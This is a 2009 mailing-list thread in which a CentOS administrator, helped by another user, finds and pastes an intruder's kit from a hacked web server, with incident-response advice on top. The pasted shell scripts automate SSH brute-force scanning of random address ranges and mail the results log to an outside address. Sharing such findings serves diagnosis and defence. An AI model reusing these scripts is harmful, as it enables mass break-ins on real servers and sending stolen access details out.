so you're going to need to figure out what the hole in your system is/was... you're going to need to patch it... you're going to need to examine the logs for logins to your other systems.. as well as examine the ssh logs for outgoing login attempts from the hacked box to other boxes in your network... if the other boxes in your network have webservers that are exposed to the net, you're going to have to examins them as well... you're going to have to check for other files (/dev/shm.. etc..) on the other boxes... but in all probablity, you should reinstall on the initial box, once you've resolved how to correct the issue... (this includes analyzing the webserver apps!!!!!!!) good luck! -----Original Message----- From: Linux Advocate [mailto:linuxhousedn at yahoo.com] Sent: Wednesday, June 03, 2009 9:33 AM To: bruce Cc: CentOS mailing list Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell.... BRUCE U ARE A F******* GENIUS MAN !!!!! u were right bro....thanx for spending the time on this man.... more info below !!!!!!!!!!!!! ----- Original Message ---- > From: bruce <bedouglas at earthlink.net> > To: linuxhousedn at yahoo.com > Sent: Wednesday, June 3, 2009 9:53:24 PM > Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell.... > > hi... > > i've seen a few of your threads on your issue of the 'atack' processes > running from your web server... > > i'm replying to you offline, as ...... > > > take a look over your box, and let's see what you have... > as per yr tip i had found a file called atack under this folder /dev/shm/unix .... even though i could not locate such a file before..... i have now removed that file and am now probing the contents of the /dev/shm/unix folder..... [root at fwgw unix]# pwd /dev/shm/unix [root at fwgw unix]# ls -al total 4352 drwxr-xr-x 2 apache apache 360 Jun 3 23:47 . drwxrwxrwt 3 root root 60 Jun 3 00:24 .. -rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22 -rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22 -rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22 -rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22 -rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22 -rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22 -rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22 -rwxr-xr-x 1 apache apache 216 May 18 2005 auto -rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf -rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find -rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log -rwxr-xr-x 1 apache apache 751 May 25 06:33 unix -rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt -rwxr-xr-x 1 apache apache 671 May 25 13:56 x The contents of file 'x' are; #!/bin/bash echo "[+] PLM prea destept pentru voi : Yuli [+]" X=0 c=0 while [ $X -le 255 ] do c=$RANDOM let "c %= 255" echo "[+] Scanam radom class b $1.$c [+]" ./find $1.$c 22 sleep 10 cat $1.$c.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 >> log mail -s $1.$c yuli1989xxx at yahoo.com < log rm -rf $1.$c.find.22 ip.conf echo "[+] Scanner a terminat de scanat !" echo "[+] Next random class b !" X=$((X+1)) the contents of the file 'unix' are; #!/bin/bash if [ $# != 1 ]; then echo "[+] Folosim : $0 [b class]" exit; fi echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]" echo "[+] SSH Brute force scanner : user & password [+]" echo "[+] Undernet Channel : #yuli [+]" echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]" ./find $1 22 sleep 10 cat $1.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 rm -rf $1.find.22 ip.conf echo "[+] UnixCoD Scanner a terminat de scanat !" the contents of 'auto' are; #!/bin/sh echo echo "Enter A class range" read brange echo "Enter output file" read file crange=0 while [ $crange -lt 255 ] ; do echo -n "./assh $brange.$crange ; " >> $file let crange=crange+1 done the contents of 'log' are; [+] No SSH ->www:www:83.246.113.34 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] No SSH ->www:www:83.246.119.41 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] Further googling indicates that UnixCod is a brute force ssh scanner... what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed attempts) and a 8 letter passwd but i still got hacked.... Guys...any comments.... AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ! Regards, Marco.